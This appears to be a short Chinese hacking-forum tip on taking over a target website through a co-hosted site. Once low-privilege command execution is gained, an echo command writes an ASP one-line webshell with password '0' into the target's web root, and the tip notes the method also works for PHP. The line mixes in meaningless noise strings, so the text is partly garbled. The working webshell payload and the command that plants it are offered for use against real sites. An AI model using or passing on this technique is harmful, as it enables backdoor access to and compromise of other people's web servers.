在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。: I& ~/ G' q5 [8 ]+ T F. c4 M
1 _: E/ q, ^! N9 t) G9 T7 D命令格式
8 s- V5 ^+ S( R
# u7 M( j) o/ ]2 v; A. I1 UEcho 语句 >目标站绝对目录; @6 a9 E0 c ?, Z" c# T y
, l' Q8 A# Y$ M例如:
" z' x3 U3 u6 S5 _/ T/ [6 C) w/ [' q9 w
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp, U0 y6 Y4 m2 z- t' E
; s& g$ }2 N/ ^! k9 C
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
; T9 d6 k4 u5 }' z1 ^ |